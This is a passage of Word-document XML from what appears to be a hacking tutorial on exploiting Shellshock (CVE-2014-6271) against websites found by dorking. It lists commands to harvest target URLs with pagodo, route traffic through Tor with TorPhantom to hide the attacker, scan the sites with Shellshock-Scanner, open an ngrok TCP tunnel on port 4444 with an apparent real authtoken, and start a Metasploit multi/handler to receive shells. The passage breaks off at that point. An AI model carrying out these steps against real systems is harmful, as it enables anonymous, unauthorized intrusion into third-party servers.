          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Pagodo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a small Python utility to automate your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7"/>
        <w:gridCol w:w="45"/>
      </w:tblGrid>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Save your dorks list into a file such as "dorks.txt"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Specify the output path and filename such as "urls.txt"</w:t>
            </w:r>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92"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>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sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">python pagodo.py </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:softHyphen/>
              <w:t xml:space="preserve">-g dorks.txt </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:softHyphen/>
              <w:t xml:space="preserve">-l 200 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:softHyphen/>
              <w:t xml:space="preserve">-s </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:softHyphen/>
              <w:t>-e 35.0 -</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:softHyphen/>
              <w:t>j 1.1 &gt;&gt; urls.txt</w:t>
            </w:r>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Source:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>github.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>INITIALIZE TOR SESSION</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Before to move further we will need to protect our anonymity by hiding our current location and connection details. On our side we will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>TorPhantom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a simple Python utility used to route all traffic through TOR. If you don’t have it yet installed on your machine, please feel free to check this article on </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">how to hide your IP using </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>TorPhantom</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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 xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>TorPhantom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gridCol w:w="45"/>
      </w:tblGrid>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Type the below commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>torphantom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> start </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:softHyphen/>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;interface&gt;</w:t>
            </w:r>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Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0">
              <wp:extent cx="5810250" cy="2423704"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:docPr id="4" name="Picture 4" descr="how-to-exploit-shellshock-vulnerability-cve-2014-627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to-exploit-shellshock-vulnerability-cve-2014-627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3654" cy="2429295"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:inline>
          </w:drawing>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>click</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> to enlarge</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>SCAN POTENTIAL TARGETS</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Now that we are properly hiding ourselves and got a complete list of potential vulnerable websites, we will scan it using </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Shellshock-Scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> in order to check if we can process further.</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Scan using Shellshock-Scanner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7"/>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Type the below commands and follow up the screen prompt</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./shellshock-scanner</w:t>
            </w:r>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Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0">
              <wp:extent cx="5943600" cy="967958"/>
              <wp:effectExtent l="0" t="0" r="0" b="3810"/>
              <wp:docPr id="3" name="Picture 3" descr="how-to-exploit-shellshock-vulnerability-cve-2014-627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to-exploit-shellshock-vulnerability-cve-2014-627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5412" cy="976396"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:inline>
          </w:drawing>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>click</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> to enlarge</w:t>
        </w:r>
      </w:hyperlink>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Once you have identified a number of URLs as being vulnerable to shellshock it’s time to have some fun!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>INITIALIZE TCP TUNNELING</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Once we are ready with our list of vulnerable websites and since all our traffic is now handled by TOR, we will create a secure TCP tunneling using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> in order to forward the traffic to our machine anonymously. For the purpose of this document we will use the Port 4444 to receive the session.</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 xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Ngrok</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7"/>
        <w:gridCol w:w="45"/>
      </w:tblGrid>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 Your Token can be found in your </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ngrok</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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ngrok</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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authtoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8ml78jQFrVNah4cN8UwTt_5ZVZYRPD8q7huTk7vo8MZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Create the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7"/>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 Create the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ngrok</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> session on the port 4444 using the below command</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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ngrok</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4444</w:t>
            </w:r>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Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0">
              <wp:extent cx="5981700" cy="2495223"/>
              <wp:effectExtent l="0" t="0" r="0" b="635"/>
              <wp:docPr id="2" name="Picture 2" descr="how-to-exploit-shellshock-vulnerability-cve-2014-627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to-exploit-shellshock-vulnerability-cve-2014-6271">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0648" cy="2498955"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:inline>
          </w:drawing>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>click</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> to enlarge</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CREATE MSF HANDLER</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In order to open a session from our targeted website we will need to create an exploit multi-handler on our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This can be done very quickly using the below commands.</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 xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Metasploit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gridCol w:w="1680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>
          <w:gridAfter w:val="1"/>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 Open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>
          <w:gridAfter w:val="2"/>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msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>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msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; use exploit/multi/handler</w:t>
            </w:r>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6"/>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msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
